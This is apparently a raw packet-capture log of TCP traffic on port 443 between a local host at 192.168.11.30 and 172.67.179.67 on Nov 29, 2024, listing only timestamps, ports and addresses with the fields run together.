                                                                                                            Nov 29, 2024 09:11:31.938127995 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.938698053 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.938709974 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.939089060 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.939254999 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.939259052 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.939275026 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.940198898 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.940210104 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.940582991 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.941917896 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.941935062 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.943053961 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.943069935 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.943449974 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.944502115 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.944523096 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.945523977 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.945523977 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.945540905 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.947386026 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.947402000 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.947550058 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.947550058 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.947563887 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.947597027 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.947644949 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.947694063 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.950650930 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.950679064 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.950813055 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.950865984 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.950865984 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.950865984 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.950875044 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.950959921 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953205109 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.953226089 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.953505039 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953505039 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953505039 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953505039 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953505039 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953505039 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.953520060 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.956037998 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.956058025 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.956243992 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.956243992 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.956257105 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.956341028 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.959263086 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.959285975 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.959846973 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.959858894 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.959863901 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.959863901 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.959863901 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.959863901 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.962245941 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.962265968 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.962383986 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.962383986 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.962399960 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.962430000 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.962430000 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.962553024 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.964732885 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.964751005 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.964802980 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.964899063 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.964899063 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.964911938 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.964951038 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.965049028 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.965049028 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.155699968 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.155721903 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.156996965 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.157011986 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.157510042 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.157720089 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.158149004 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.158157110 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.158202887 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.158700943 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.158893108 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.158902884 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.161168098 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.161180973 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.162132025 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.162142038 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.163842916 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.163856983 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.164830923 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.164839983 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.165394068 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.166676998 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.166691065 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.167876005 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.167890072 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.169871092 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.169889927 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.170083046 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.171307087 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.171319008 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.171677113 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.171819925 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.172086954 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.172096968 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.172622919 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.173029900 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.174429893 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.174444914 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.175503969 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.175512075 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.175899982 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.177042961 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.177054882 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.178339958 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.178352118 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.180428028 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.180442095 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.181035995 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.181044102 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.182905912 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.182919979 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.183229923 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.183237076 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.183420897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.183600903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.185843945 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.185858011 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.186038017 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.186187029 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.186192036 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.189096928 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.189112902 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.189486980 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.189492941 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.191855907 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.191865921 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.193038940 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.193048000 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.194044113 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.194109917 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.194948912 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.194955111 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.195933104 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.389199972 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.389215946 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.389574051 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.389583111 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.389839888 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.392041922 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.392146111 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.392273903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.392273903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.392285109 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.392369032 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.392416954 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.392811060 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.393326998 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.395575047 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.395590067 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.395731926 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.395731926 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.395778894 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.395787954 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.395828009 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.395873070 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.395972013 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.396275997 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.396522045 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.399501085 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.399514914 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.399903059 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.399914026 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.400135994 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.402264118 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.402278900 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.402417898 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.402471066 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.402471066 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.402478933 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.402561903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.402616024 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.404958010 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.404974937 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.405155897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.405155897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.405205011 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.405205011 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.405205011 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.405213118 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.405374050 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.407742023 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.407759905 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.407898903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.407951117 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.407951117 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.407957077 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.408045053 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.408096075 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.411067963 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.411086082 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.411319971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.411417007 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.411423922 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.411705971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.413635969 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.413652897 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.413784981 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.413784981 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.413830042 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.413836002 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.413882971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.413882971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.414000988 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.416495085 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.416507006 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.416713953 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.416713953 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.416726112 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.418088913 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.418088913 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.419056892 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.419066906 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.420181036 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.420188904 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.421503067 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.422394991 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.422405958 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.423398018 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.423789978 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.423794985 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.424913883 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.425098896 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.425122023 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.425875902 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.425889015 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.426244974 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.427828074 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.427856922 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.427988052 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.428037882 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.428045988 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.428177118 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.428226948 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.428602934 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.428797960 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.623434067 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.623445988 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.623538971 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.624695063 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.624701977 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.626483917 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.626497030 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.627590895 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.627599955 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.627974033 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.629013062 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.629021883 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.630037069 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.630044937 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.630048037 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.632304907 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.632317066 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.632467985 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.632467985 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.632474899 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.632515907 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.632515907 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.632613897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.634243965 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.634308100 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.634450912 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.634567022 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.634569883 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.634728909 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.637497902 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.637514114 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.637691021 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.637691021 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.637691021 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.637698889 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.637742043 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.637789011 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.637888908 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.638572931 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.638725996 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.638775110 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.640326977 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.640460014 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.640460014 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.640460014 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.640559912 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.640605927 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.640609026 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.640772104 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.643029928 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.643126011 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.643858910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.643858910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.643858910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.643858910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.643865108 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.644047022 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.645724058 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.645823956 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.645869017 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.645869017 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.645916939 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.645920038 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.645966053 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.645966053 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.646014929 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.648814917 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.648823977 CET44349766172.67.179.67192.168.11.30
